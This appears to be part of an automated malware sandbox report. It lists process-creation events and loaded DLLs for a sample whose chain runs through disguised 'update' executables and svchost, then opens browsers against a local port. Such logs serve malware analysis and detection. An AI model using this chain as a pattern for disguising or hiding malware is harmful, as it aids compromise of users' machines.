Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\10000160101\readerupdate2.exe "C:\Users\user\AppData\Local\Temp\10000160101\readerupdate2.exe"
Source: C:\Users\user\AppData\Local\Temp\10000160101\readerupdate2.exe	Process created: C:\Users\user\AppData\Local\Temp\ExtractedZip_1cf60734\rdha.exe "C:\Users\user\AppData\Local\Temp\ExtractedZip_1cf60734\rdha.exe"
Source: C:\Users\user\AppData\Local\Temp\ExtractedZip_1cf60734\rdha.exe	Process created: C:\Windows\SysWOW64\svchost.exe "C:\Windows\System32\svchost.exe"
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\10000160101\readerupdate2.exe "C:\Users\user\AppData\Local\Temp\10000160101\readerupdate2.exe"
Source: C:\Windows\SysWOW64\svchost.exe	Process created: C:\Windows\System32\svchost.exe "C:\Windows\System32\svchost.exe"
Source: C:\Users\user\AppData\Local\Temp\10000160101\readerupdate2.exe	Process created: C:\Users\user\AppData\Local\Temp\ExtractedZip_1cf60734\rdha.exe "C:\Users\user\AppData\Local\Temp\ExtractedZip_1cf60734\rdha.exe"
Source: C:\Users\user\AppData\Local\Temp\ExtractedZip_1cf60734\rdha.exe	Process created: C:\Windows\SysWOW64\svchost.exe "C:\Windows\System32\svchost.exe"
Source: C:\Windows\SysWOW64\svchost.exe	Process created: C:\Windows\System32\svchost.exe "C:\Windows\System32\svchost.exe"
Source: C:\Windows\System32\svchost.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe"
Source: unknown	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe "C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe"
Source: unknown	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe "C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe"
Source: unknown	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe "C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe"
Source: unknown	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe "C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe"
Source: C:\Windows\System32\svchost.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe --user-data-dir="C:\Users\user\AppData\Local\Temp\chr3549.tmp" --explicitly-allowed-ports=8000 --disable-gpu --new-window "http://127.0.0.1:8000/d64e6a9d/c462449b"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=2408,i,17781879353702951408,17998712675183720793,262144 --variations-seed-version --mojo-platform-channel-handle=2448 /prefetch:3
Source: C:\Windows\System32\svchost.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe --user-data-dir="C:\Users\user\AppData\Local\Temp\chr40D3.tmp" --explicitly-allowed-ports=8000 --disable-gpu --new-window "http://127.0.0.1:8000/d64e6a9d/c7af6c55"
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2540 --field-trial-handle=2044,i,15576995492371411568,11296989779749965801,262144 /prefetch:3
Source: C:\Windows\System32\svchost.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe"
Source: unknown	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe "C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe"
Source: unknown	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe "C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe"
Source: unknown	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe "C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe"
Source: unknown	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe "C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe"
Source: C:\Windows\System32\svchost.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe --user-data-dir="C:\Users\user\AppData\Local\Temp\chr6235.tmp" --explicitly-allowed-ports=8000 --disable-gpu --new-window "http://127.0.0.1:8000/c517716a/c462449b"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=1976,i,1738051838686581757,9242174094386014709,262144 --variations-seed-version --mojo-platform-channel-handle=2096 /prefetch:3
Source: C:\Windows\System32\svchost.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe --user-data-dir="C:\Users\user\AppData\Local\Temp\chr6E2C.tmp" --explicitly-allowed-ports=8000 --disable-gpu --new-window "http://127.0.0.1:8000/c517716a/c7af6c55"
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2528 --field-trial-handle=2212,i,3169092561735658091,5359822219130930999,262144 /prefetch:3
Source: C:\Windows\System32\svchost.exe	Process created: C:\Program Files\Windows Media Player\wmpnscfg.exe "C:\Program Files\Windows Media Player\wmpnscfg.exe"
Source: unknown	Process created: C:\Users\user\AppData\Roaming\Avt\AvastBrowserUpdate.exe C:\Users\user\AppData\Roaming\Avt\AvastBrowserUpdate.exe
Source: C:\Program Files\Windows Media Player\wmpnscfg.exe	Process created: C:\Windows\System32\dllhost.exe "C:\Windows\system32\dllhost.exe"
Source: C:\Users\user\AppData\Roaming\Avt\AvastBrowserUpdate.exe	Process created: C:\Windows\SysWOW64\svchost.exe "C:\Windows\System32\svchost.exe"
Source: C:\Users\user\Desktop\9ua5N7dcBZ.exe	Process created: C:\Users\user\AppData\Local\Temp\ExtractedZip_75ef75e6\update.exe "C:\Users\user\AppData\Local\Temp\ExtractedZip_75ef75e6\update.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ExtractedZip_75ef75e6\update.exe	Process created: C:\Users\user\AppData\Local\Temp\3140a3c17c\Gxtuum.exe "C:\Users\user\AppData\Local\Temp\3140a3c17c\Gxtuum.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3140a3c17c\Gxtuum.exe	Process created: C:\Users\user\AppData\Local\Temp\10000160101\readerupdate2.exe "C:\Users\user\AppData\Local\Temp\10000160101\readerupdate2.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10000160101\readerupdate2.exe	Process created: C:\Users\user\AppData\Local\Temp\ExtractedZip_1cf60734\rdha.exe "C:\Users\user\AppData\Local\Temp\ExtractedZip_1cf60734\rdha.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ExtractedZip_1cf60734\rdha.exe	Process created: C:\Windows\SysWOW64\svchost.exe "C:\Windows\System32\svchost.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process created: C:\Windows\System32\fontdrvhost.exe "C:\Windows\System32\fontdrvhost.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10000160101\readerupdate2.exe	Process created: C:\Users\user\AppData\Local\Temp\ExtractedZip_1cf60734\rdha.exe "C:\Users\user\AppData\Local\Temp\ExtractedZip_1cf60734\rdha.exe"
Source: C:\Users\user\AppData\Local\Temp\ExtractedZip_1cf60734\rdha.exe	Process created: C:\Windows\SysWOW64\svchost.exe "C:\Windows\System32\svchost.exe"
Source: C:\Windows\SysWOW64\svchost.exe	Process created: C:\Windows\System32\svchost.exe "C:\Windows\System32\svchost.exe"
Source: C:\Users\user\AppData\Local\Temp\10000160101\readerupdate2.exe	Process created: C:\Users\user\AppData\Local\Temp\ExtractedZip_1cf60734\rdha.exe "C:\Users\user\AppData\Local\Temp\ExtractedZip_1cf60734\rdha.exe"
Source: C:\Windows\System32\svchost.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe"
Source: C:\Windows\System32\svchost.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe --user-data-dir="C:\Users\user\AppData\Local\Temp\chr3549.tmp" --explicitly-allowed-ports=8000 --disable-gpu --new-window "http://127.0.0.1:8000/d64e6a9d/c462449b"
Source: C:\Windows\System32\svchost.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe --user-data-dir="C:\Users\user\AppData\Local\Temp\chr40D3.tmp" --explicitly-allowed-ports=8000 --disable-gpu --new-window "http://127.0.0.1:8000/d64e6a9d/c7af6c55"
Source: C:\Windows\System32\svchost.exe	Process created: C:\Program Files\Windows Media Player\wmpnscfg.exe "C:\Program Files\Windows Media Player\wmpnscfg.exe"
Source: C:\Users\user\AppData\Local\Temp\ExtractedZip_1cf60734\rdha.exe	Process created: C:\Windows\SysWOW64\svchost.exe "C:\Windows\System32\svchost.exe"
Source: C:\Windows\SysWOW64\svchost.exe	Process created: C:\Windows\System32\svchost.exe "C:\Windows\System32\svchost.exe"
Source: C:\Windows\System32\svchost.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe"
Source: C:\Windows\System32\svchost.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe --user-data-dir="C:\Users\user\AppData\Local\Temp\chr6235.tmp" --explicitly-allowed-ports=8000 --disable-gpu --new-window "http://127.0.0.1:8000/c517716a/c462449b"
Source: C:\Windows\System32\svchost.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe --user-data-dir="C:\Users\user\AppData\Local\Temp\chr6E2C.tmp" --explicitly-allowed-ports=8000 --disable-gpu --new-window "http://127.0.0.1:8000/c517716a/c7af6c55"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=2408,i,17781879353702951408,17998712675183720793,262144 --variations-seed-version --mojo-platform-channel-handle=2448 /prefetch:3
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2540 --field-trial-handle=2044,i,15576995492371411568,11296989779749965801,262144 /prefetch:3
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=1976,i,1738051838686581757,9242174094386014709,262144 --variations-seed-version --mojo-platform-channel-handle=2096 /prefetch:3
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2528 --field-trial-handle=2212,i,3169092561735658091,5359822219130930999,262144 /prefetch:3
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files\Windows Media Player\wmpnscfg.exe	Process created: C:\Windows\System32\dllhost.exe "C:\Windows\system32\dllhost.exe"
Source: C:\Program Files\Windows Media Player\wmpnscfg.exe	Process created: unknown unknown
Source: C:\Program Files\Windows Media Player\wmpnscfg.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Roaming\Avt\AvastBrowserUpdate.exe	Process created: C:\Windows\SysWOW64\svchost.exe "C:\Windows\System32\svchost.exe"
Source: C:\Windows\SysWOW64\svchost.exe	Process created: unknown unknown

Source: C:\Users\user\Desktop\9ua5N7dcBZ.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\9ua5N7dcBZ.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\9ua5N7dcBZ.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\9ua5N7dcBZ.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\9ua5N7dcBZ.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\9ua5N7dcBZ.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\9ua5N7dcBZ.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\9ua5N7dcBZ.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\9ua5N7dcBZ.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\9ua5N7dcBZ.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\9ua5N7dcBZ.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\9ua5N7dcBZ.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\9ua5N7dcBZ.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\9ua5N7dcBZ.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\9ua5N7dcBZ.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\9ua5N7dcBZ.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\9ua5N7dcBZ.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\9ua5N7dcBZ.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\9ua5N7dcBZ.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\9ua5N7dcBZ.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\9ua5N7dcBZ.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\9ua5N7dcBZ.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\9ua5N7dcBZ.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\9ua5N7dcBZ.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\9ua5N7dcBZ.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\9ua5N7dcBZ.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\9ua5N7dcBZ.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ExtractedZip_75ef75e6\update.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ExtractedZip_75ef75e6\update.exe	Section loaded: g2m.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ExtractedZip_75ef75e6\update.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ExtractedZip_75ef75e6\update.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ExtractedZip_75ef75e6\update.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ExtractedZip_75ef75e6\update.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ExtractedZip_75ef75e6\update.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ExtractedZip_75ef75e6\update.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ExtractedZip_75ef75e6\update.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ExtractedZip_75ef75e6\update.exe	Section loaded: mstask.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ExtractedZip_75ef75e6\update.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ExtractedZip_75ef75e6\update.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ExtractedZip_75ef75e6\update.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ExtractedZip_75ef75e6\update.exe	Section loaded: dui70.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ExtractedZip_75ef75e6\update.exe	Section loaded: duser.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ExtractedZip_75ef75e6\update.exe	Section loaded: chartv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ExtractedZip_75ef75e6\update.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ExtractedZip_75ef75e6\update.exe	Section loaded: oleacc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ExtractedZip_75ef75e6\update.exe	Section loaded: atlthunk.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ExtractedZip_75ef75e6\update.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ExtractedZip_75ef75e6\update.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ExtractedZip_75ef75e6\update.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ExtractedZip_75ef75e6\update.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ExtractedZip_75ef75e6\update.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ExtractedZip_75ef75e6\update.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ExtractedZip_75ef75e6\update.exe	Section loaded: wtsapi32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ExtractedZip_75ef75e6\update.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ExtractedZip_75ef75e6\update.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ExtractedZip_75ef75e6\update.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ExtractedZip_75ef75e6\update.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ExtractedZip_75ef75e6\update.exe	Section loaded: windows.fileexplorer.common.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ExtractedZip_75ef75e6\update.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ExtractedZip_75ef75e6\update.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ExtractedZip_75ef75e6\update.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ExtractedZip_75ef75e6\update.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ExtractedZip_75ef75e6\update.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ExtractedZip_75ef75e6\update.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ExtractedZip_75ef75e6\update.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ExtractedZip_75ef75e6\update.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ExtractedZip_75ef75e6\update.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ExtractedZip_75ef75e6\update.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ExtractedZip_75ef75e6\update.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ExtractedZip_75ef75e6\update.exe	Section loaded: explorerframe.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ExtractedZip_75ef75e6\update.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3140a3c17c\Gxtuum.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3140a3c17c\Gxtuum.exe	Section loaded: g2m.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3140a3c17c\Gxtuum.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3140a3c17c\Gxtuum.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3140a3c17c\Gxtuum.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3140a3c17c\Gxtuum.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3140a3c17c\Gxtuum.exe	Section loaded: g2m.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3140a3c17c\Gxtuum.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3140a3c17c\Gxtuum.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3140a3c17c\Gxtuum.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3140a3c17c\Gxtuum.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3140a3c17c\Gxtuum.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3140a3c17c\Gxtuum.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3140a3c17c\Gxtuum.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3140a3c17c\Gxtuum.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3140a3c17c\Gxtuum.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3140a3c17c\Gxtuum.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3140a3c17c\Gxtuum.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3140a3c17c\Gxtuum.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3140a3c17c\Gxtuum.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3140a3c17c\Gxtuum.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3140a3c17c\Gxtuum.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3140a3c17c\Gxtuum.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3140a3c17c\Gxtuum.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3140a3c17c\Gxtuum.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3140a3c17c\Gxtuum.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3140a3c17c\Gxtuum.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3140a3c17c\Gxtuum.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3140a3c17c\Gxtuum.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3140a3c17c\Gxtuum.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3140a3c17c\Gxtuum.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3140a3c17c\Gxtuum.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3140a3c17c\Gxtuum.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3140a3c17c\Gxtuum.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3140a3c17c\Gxtuum.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3140a3c17c\Gxtuum.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3140a3c17c\Gxtuum.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3140a3c17c\Gxtuum.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10000160101\readerupdate2.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10000160101\readerupdate2.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10000160101\readerupdate2.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10000160101\readerupdate2.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10000160101\readerupdate2.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10000160101\readerupdate2.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
